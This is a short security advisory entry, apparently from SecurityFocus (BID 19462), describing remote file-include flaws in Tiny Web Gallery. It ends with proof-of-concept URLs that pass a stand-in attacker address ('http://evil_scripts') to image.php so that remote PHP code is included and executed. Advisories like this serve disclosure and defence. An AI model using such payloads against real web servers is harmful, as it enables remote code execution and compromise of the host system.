7 lines
No EOL
633 B
Text
7 lines
No EOL
633 B
Text
source: https://www.securityfocus.com/bid/19462/info
|
|
|
|
Tiny Web Gallery is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
|
|
|
|
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
|
|
|
|
http://www.example.com/[path]/examples/image.php?image=http://evil_scripts http://www.example.com/[path]/examples/examples/image.php2?image=http://evil_scripts? |